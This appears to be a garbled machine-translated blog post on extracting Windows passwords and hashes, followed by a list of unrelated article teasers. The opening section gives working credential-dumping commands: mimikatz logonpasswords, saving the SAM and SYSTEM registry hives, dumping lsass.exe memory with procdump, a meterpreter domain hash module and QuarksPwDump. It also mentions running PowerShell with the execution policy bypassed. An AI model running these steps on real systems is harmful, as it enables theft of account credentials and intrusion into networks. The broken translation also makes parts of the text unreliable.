mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
powershell -exec bypass
Get meterpreter Omit the process of , use smb445 Port to establish a connection
post/windows/gather/credentials/domain_hashdump( Get domain hash)
wdigest（ Plaintext ）
4.cs go online
The host needs to be at least administrator jurisdiction ,user The authority needs to be raised before it can be grasped
logonpasswords（ Plaintext ）
Here I use powershell go online , I won't go into details about the online process
Offline password capture
1.SAM( Shadow copy 、 The registry )
Shadow copy ： Shadow copy , Also known as snapshots , Is stored in the Data Protection Manager (DPM) Point in time copy of the copy on the server . A replica is a protected share of a single volume on a file server 、 Full point in time copies of folders and files .
In the administrator state, execute the following command
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
Until then mimikatz Execute the following command
lsadump::sam /sam:sam.hiv /system:system.hiv
(2)lsass.exe( Inject lsass.exe process , And extract... From its memory )
Execute the following command ：
procdump.exe -accepteula -ma lsass.exe lsass.dmp
There is mimikatz and dmp File directory cmd, Execute the following command
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
notes ： Both of these steps require administrator privileges , Otherwise, the following error will be reported
(3) Manual export lsass.dmp file
Use task manager to export lsass.dmp file
The steps are the same as above
The order is as follows ：
QuarksPwDump.exe –dhl -o hash.txt
Grab the plaintext
The order is as follows
Thank you for your ideas , That's why this article , I would like to express my heartfelt thanks to master Yicun Yiye
There's a lot more to catch here hash The advanced method of , But because of technology, even in practice, we don't know the principle , So I'm not going to do in-depth research for the moment , Post a link to interested masters , You can continue to delve into , Wait until you have enough knowledge
- windows In the environment mysql Password reset
1. open cmd window , Enter the command [mysqld --skip-grant-tables] enter . 2. Open one more cmd window , Enter the command [mysql] enter . 3. Enter the command [use mysql; ] Connect permission data ...
- windows In the environment mysql How to modify root password
windows In the environment mysql How to modify root password With windows For example : Unable to open service , take mysql More in the catalog data Empty folder , And then call mysqld --initialize Turn on mysql ...
- windows In the environment nutch2.x stay eclipse Capture data and save it in mysql The detailed steps
nutch2.x stay eclipse Capture data and save it in mysql step Recent research nutch, It took a few days , There are also many problems , It turned out to be a success , Record here , And provide reference for other interested people , Common progress . Yes nutc ...
- 【 Wise remark of an experienced person 】Git Use it Windows Environment
Preface install To configure About git A few questions about using Postscript About code hosting , Previously used vss and svn, When reading blogs or forums , It is often mentioned that github, There are many famous open source software hosted in github, I think it's good ( Don't laugh ), When ...
- 《 High availability MySQL》1 – Windows Compressed version of the environment MySQL install
I've been reading O’REILIY Series of < High availability MySQL>, It's natural to have a master and a slave (Master-Slave) Configure content related to scale out .Master-Slave This thing , It's standard in many companies , Basic days in development ...
- The first part ： Use iReport The detailed process of making report （Windows In the environment ）
Tips : In some sectors , I can't see the pictures in the article , Suggest to me blog Browse the article :http://blog.csdn.net/jemlee2002/ The article will cover 3 All aspects : The first part : Use iReport The details of making reports ...
- Windows In the environment Oracle Automatic backup script of database
Batch file (.bat) @echo off echo ================================================ echo Windows In the environment Oracle data ...
- Android Development of Windows In the environment Android Studio Installation and use tutorial ( The detailed steps are as follows )
Given Google's latest Android Studio Highly respected by developers , So also follow the experience . One . Introduce Android Studio Android Studio It's a Android development environment , be based on Intel ...
- Android Development of Windows Pass in the environment Eclipse The first Android App created （ The detailed steps are as follows ）
Chapter one windows The first Android application created in the environment For convenience , I only use the all-in-one package to demonstrate . One . Download the all in one package of Android environment . Download from the official website : Android official website ( It's usually covered by walls ) Online disk download : http://yunpa ...
- Windows In the environment Redis
Redis Is a high-performance key-value database , Use memory as main storage , Data access is very fast , Of course, it also provides two mechanisms to support data persistent storage . It's a pity that ,Redis The project does not directly support Windows,Windo ...
- oracle Common commands （ It's common and easy to use ）
One .ORACLE Start up and shut down 1. In a stand-alone environment To turn it on or off ORACLE The system must first switch to ORACLE user , as follows su - oracle a. start-up ORACLE System oracle>svrmgr ...
- by OpenResty increase nginx_upload_module modular
1. download http://www.grid.net.ru/nginx/download/nginx_upload_module-2.2.0.tar.gz or http://pan.baidu.com/s ...
- Reactor Pattern , Or reactor mode
Reactor There is really no proper translation of this word into Chinese , It's called reactor mode in many places , But it's more like calling reactor The model , In fact, I think it's better to understand the responder model . By understanding , This model is more like a bodyguard , I've been waiting for your call , or ...
- Android -&gt; How to avoid Handler Cause memory leak
A lot of other stuff , Access to personal blogs www.liangfeizc.com Error code Suppose that Activiy Through inner classes (Runnable) Defines a variable in the same way runnable, final Runnable r ...
- Linux Next DIR,dirent,stat And so on
Excerpt from :http://www.liweifan.com/2012/05/13/linux-system-function-files-operation/ Recently in to see Linux The next chapter is about file operation , I met this ...
- 2、Libgdx Configure your development environment （Eclipse,Intellij IDEA,NetBeans）
Libgdx Project use Gradle Management dependence , The construction process and IDE Integrate . This allows you to use your favorite development environment to develop your application . Don't submit to IDE To your source control system . To configure Eclipse If you want to by Ecli ...
- Python Installation and small program writing
Python Installation Before that , I have no idea Python, In order to complete the task , In a hurry to understand Python, Through Baidu , Install step by step Python The process 1. Find the download menu from the official website and download the latest version 2. double-click pyt ...
- Django command
django # install : pip3 install django Add environment variables #1 establish project django-admin startproject mysite ---mysite ---se ...
- java note ---- Interview question summary （ One ）【 turn 】
1. What are the features of object-oriented ? answer : The characteristics of object-oriented are as follows : - abstract : Abstract is the process of summing up the common characteristics of a class of objects to construct a class , Including data abstraction and behavior abstraction . Abstractions only focus on the properties and behaviors of objects , Not paying attention ...
- go Related knowledge
Follow up development go relevant , Environment building go env // View all of the environments go There are only three types of references slice( section ). map( Dictionaries ). channel( The Conduit ): go The type of shallow memory 4 Secondary type bool, character string , Numbers ...